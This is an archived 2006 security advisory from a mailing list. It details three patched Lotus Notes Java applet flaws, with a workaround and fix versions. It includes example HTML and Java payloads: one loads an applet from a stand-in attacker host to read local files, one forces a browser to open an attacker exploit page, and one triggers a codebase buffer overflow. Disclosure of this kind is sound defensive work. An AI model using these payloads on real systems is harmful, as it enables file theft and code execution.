Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[NT] Details of Lotus Notes Java Applet vulnerabilities

from [SecuriTeam] Network Security [Permanent Link]
Subject: [NT] Details of Lotus Notes Java Applet vulnerabilities
Date: 10 Oct 2006 18:06:29 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Details of Lotus Notes Java Applet vulnerabilities
------------------------------------------------------------------------


SUMMARY

Lotus Notes is "a groupware/e-mail system developed by Lotus Software. Due 
to its security and collaboration features it's used particularly by large 
organizations, government agencies, etc. IBM estimates it is used by 60 
million people".

Out of academic interest, Jouko is posting some technical details of three 
old Lotus Notes 6.0x/6.5x vulnerabilities. IBM was notified during 
July-August 2004 and a fix is available.

DETAILS

Vulnerable Systems:
 * Lotus Notes version 6.5.3 and prior
 * Lotus Notes version 6.0.4 and prior

Immune Systems:
 * Lotus Notes version 6.5.4
 * Lotus Notes version 6.0.5

The vulnerabilities involve Java applets embedded in HTML formatted e-mail 
messages. A  contributing factor in all of the issues is that such Java 
applets are automatically displayed when the e-mail message is viewed 
(unlike with most e-mail clients).

Vulnerability 1: global file read access
An e-mail message containing a Java Applet with the codebase "file:///" 
gains unlimited read access to local files when the e-mail is viewed. An 
example HTML snippet follows:
   <applet codebase="file:///" 
archive="http://www.attacker.tld/applet.jar";
   width="1" height="1"></applet>

The applet's Java bytecode itself needn't be contained in the e-mail but 
it's only referenced by the archive URL. The applet gets automatically 
loaded when the e-mail is viewed. It has file read access on the local 
system (can read whatever files the currently logged in user can, and list 
hard drive contents). The applet can use e.g. JavaScript to relay the 
files to the attacker.

Vulnerability 2: launching web browser
A Java applet embedded in the same way can forcibly launch a web browser 
with the desired URL when an e-mail message is viewed. An example piece of 
Java code to do this follows:
  public void init() {
    
getAppletContext().showDocument("http://www.attacker.tld/ie-exploits.html";);
  }

Under default settings, Internet Explorer is launched and the attacker 
supplied URL is opened in it when the e-mail message is viewed. This 
exposes the system to Internet Explorer vulnerabilities, greatly widening 
the attack surface.

Vulnerability 3: codebase buffer overflow
Opening an HTML e-mail message which contains an applet tag with a long 
codebase parameter (over 500 bytes) causes an apparently stack-based 
buffer overflow condition. It may be exploitable to run arbitrary code on 
the victim system when the e-mail message is viewed. This is an example 
piece of HTML to produce it:
 <applet codebase="A:AAAAAAAAAAAAAAA( repeat 520 A's )AAAAAA"
  code="java.applet.Applet" width=100 height=100></applet>

Exploitability of this scenario was NOT confirmed.

Workaround:
Disabling Java applets can be used to protect from these vulnerabilities. 
To disable Java applets, select File -> Preferences -> User Preferences 
from the Notes client menu and uncheck the option for "Enable Java 
applets."

Solution:
The issues have been addressed in Lotus Notes versions 6.5.4 and 6.0.5. 
For detailed fix information, see
 
<http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en>
 
http://www-1.ibm.com/support/docview.wss?rs=0&uid=swg21173910&loc=en_US&cs=utf-8&cc=us&lang=en


ADDITIONAL INFORMATION

The information has been provided by  <mailto:jouko@iki.fi> Jouko 
Pynnonen.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [NT] Details of Lotus Notes Java Applet vulnerabilities, SecuriTeam <=
Previous by Date:  [UNIX] Moodle tag Parameter SQL Injection, SecuriTeam
Next by Date:  [UNIX] FreeBSD ptrace PT_LWPINFO DoS, SecuriTeam
Previous by Thread:  [UNIX] Moodle tag Parameter SQL Injection, SecuriTeam
Next by Thread:  [UNIX] FreeBSD ptrace PT_LWPINFO DoS, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]